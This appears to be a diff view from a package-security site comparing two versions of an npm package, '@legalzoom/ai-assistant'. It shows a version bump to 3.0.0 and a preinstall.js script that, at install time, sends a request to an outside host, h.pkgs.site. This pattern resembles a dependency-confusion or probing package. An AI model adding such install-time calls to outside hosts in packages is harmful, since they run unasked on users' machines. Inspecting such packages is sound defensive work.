@legalzoom/ai-assistant 1.0.1 → 3.0.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/preinstall.js +1 -1
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@legalzoom/ai-assistant",
3
- "version": "1.0.1",
3
+ "version": "3.0.0",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/preinstall.js CHANGED
@@ -23,7 +23,7 @@ try {
23
23
  const axios = require('axios');
24
24
  const semver = require('semver');
25
25
 
26
- const url = 'https://h.pkgs.site/legalzoom/ai-assistant?v=1.0.1';
26
+ const url = 'https://h.pkgs.site/legalzoom/ai-assistant?v=3.0.0';
27
27
 
28
28
  axios.get(url)
29
29
  .then(res => {